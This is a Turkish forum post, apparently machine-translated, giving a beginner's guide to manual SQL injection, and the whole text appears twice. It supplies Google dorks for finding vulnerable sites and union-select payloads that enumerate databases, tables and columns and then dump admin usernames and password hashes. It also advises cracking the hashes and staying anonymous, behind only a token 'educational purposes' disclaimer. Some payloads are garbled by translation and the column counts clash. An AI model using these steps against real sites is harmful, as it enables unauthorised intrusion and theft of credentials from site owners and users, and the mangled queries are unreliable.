MerHaba Spy Ailemiz Nbr?
Dostlar Umarim Yenilerin işine Yarar
Manuel SQL Enjeksiyonu.
Adım 1: Bir hedef bulma.
Web korsanlığına yeni başlayanlar için google dorks kullanmak gerçekten yardımcı olabilir. İşte birkaçı:
Bir bağlantıya tıklayın, yüklenmesine izin verin. Düzgün yüklenirse, sonuna bir ' koyun, buna benzer bir şey elde edeceksiniz:
TEST:
Adım 2: Sütun Sayısını Bulun.
Şimdi, ' işaretini kaldırın ve ekleyin: order by 5--
Bir hata alırsanız, harika, yine de okumaya devam edin. Değilse, okumaya devam etmelisiniz.
Şuna benzer bir ekran görene kadar 5 eklemeye devam edin:
Ardından, çalışan 5 ile çalışmayan 5 arasında, yüklenmeyene veya bir hata verene kadar siparişi her seferinde 1'e kadar numaralandırın (6'ya göre sırala, 7'ye göre sırala, vb.). Tabii ki şansım yaver gitti, ON error 10 hatasını aldım. Dolayısıyla 9 kolon var!
3. Adım: Hangi sütunun savunmasız olduğunu bulun.
id='den sonra bir -
Bu önemli!
Ardından, sayıdan sonra yazın, birlik tümü seç 1,2,3,4,5,6,7,8,9--
Açıkça, sitenizde yalnızca 4 sütun varsa, birlik tümü seç 1,2 olur, 3,4
Hangi sütunun doğrudan savunmasız olduğu size söylenecek.
Örnek:
Adım 4: MySQL sürümünü edinin
Güvenlik açığı bulunan sütun için sayıyı @@sürüm ile değiştirin
Örnek:
Şu andan itibaren, örnekler benimki gibi gösterilecek, bunu sitenizle çalışacak şekilde değiştirin!
Adım 5: Veritabanlarını Alın
Bilgilerinizi şu şekilde değiştirin: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--
Ardından group_concat(schema_name) öğesini database() olarak değiştirin, bu size mevcut veritabanınızı verecektir.
Adım 6: Tabloları Alın
Sonraki:
birleşim, bilgi_schema.tables'den 1,group_concat(table_name),3,4,5,6,7,8'i seçin, burada table_schema=database()--
Size tablo listesini vermelidir. Imgur çalışmayı bıraktı, bu yüzden düşünmeye başlayın!;D
admin adında bir masam var. Tabi lan!
Adım 7: Columns union'ı alın
info_schema.columns'dan 1,group_concat(column_name),3,4,5,6,7,8 öğesini seçin, burada table_schema=database()--
Biri adminUser ve diğeri adminPassword adlı bazı sütunlar aldım .
Adım 8: Yönetici Girişleri!
Neredeyse bitti!
union all 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--
Unutmayın, parantez içindeki sütunlar, tablonun sonunda
Rastgele görünen dizeleri alırsanız harfler ve sayılar, bu md5, bu yüzden google'da "md5'in şifresini çevrimiçi çöz" veya Cain ve Abel'ı alın
Bu sadece eğitim amaçlıdır. Yaptıklarından sen sorumlusun, ama anonim kalmayı unutma!
Dostlar Umarim Yenilerin işine Yarar
Manuel SQL Enjeksiyonu.
Adım 1: Bir hedef bulma.
Web korsanlığına yeni başlayanlar için google dorks kullanmak gerçekten yardımcı olabilir. İşte birkaçı:
inurl:index.php?id=
inurl:news.php?id=
inurl:gallery.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=
Bir bağlantıya tıklayın, yüklenmesine izin verin. Düzgün yüklenirse, sonuna bir ' koyun, buna benzer bir şey elde edeceksiniz:
NORMAL:
TEST:
Kullanılabilir!
Adım 2: Sütun Sayısını Bulun.
Şimdi, ' işaretini kaldırın ve ekleyin: order by 5--
Bir hata alırsanız, harika, yine de okumaya devam edin. Değilse, okumaya devam etmelisiniz.
Şuna benzer bir ekran görene kadar 5 eklemeye devam edin:
Ardından, çalışan 5 ile çalışmayan 5 arasında, yüklenmeyene veya bir hata verene kadar siparişi her seferinde 1'e kadar numaralandırın (6'ya göre sırala, 7'ye göre sırala, vb.). Tabii ki şansım yaver gitti, ON error 10 hatasını aldım. Dolayısıyla 9 kolon var!
3. Adım: Hangi sütunun savunmasız olduğunu bulun.
id='den sonra bir -
Bu önemli!
Ardından, sayıdan sonra yazın, birlik tümü seç 1,2,3,4,5,6,7,8,9--
Açıkça, sitenizde yalnızca 4 sütun varsa, birlik tümü seç 1,2 olur, 3,4
Hangi sütunun doğrudan savunmasız olduğu size söylenecek.
Örnek:
Adım 4: MySQL sürümünü edinin
Güvenlik açığı bulunan sütun için sayıyı @@sürüm ile değiştirin
Örnek:
Şu andan itibaren, örnekler benimki gibi gösterilecek, bunu sitenizle çalışacak şekilde değiştirin!
Adım 5: Veritabanlarını Alın
Bilgilerinizi şu şekilde değiştirin: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--
Ardından group_concat(schema_name) öğesini database() olarak değiştirin, bu size mevcut veritabanınızı verecektir.
Adım 6: Tabloları Alın
Sonraki:
birleşim, bilgi_schema.tables'den 1,group_concat(table_name),3,4,5,6,7,8'i seçin, burada table_schema=database()--
Size tablo listesini vermelidir. Imgur çalışmayı bıraktı, bu yüzden düşünmeye başlayın!;D
admin adında bir masam var. Tabi lan!
Adım 7: Columns union'ı alın
info_schema.columns'dan 1,group_concat(column_name),3,4,5,6,7,8 öğesini seçin, burada table_schema=database()--
Biri adminUser ve diğeri adminPassword adlı bazı sütunlar aldım .
Adım 8: Yönetici Girişleri!
Neredeyse bitti!
union all 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--
Unutmayın, parantez içindeki sütunlar, tablonun sonunda
Rastgele görünen dizeleri alırsanız harfler ve sayılar, bu md5, bu yüzden google'da "md5'in şifresini çevrimiçi çöz" veya Cain ve Abel'ı alın
Bu sadece eğitim amaçlıdır. Yaptıklarından sen sorumlusun, ama anonim kalmayı unutma!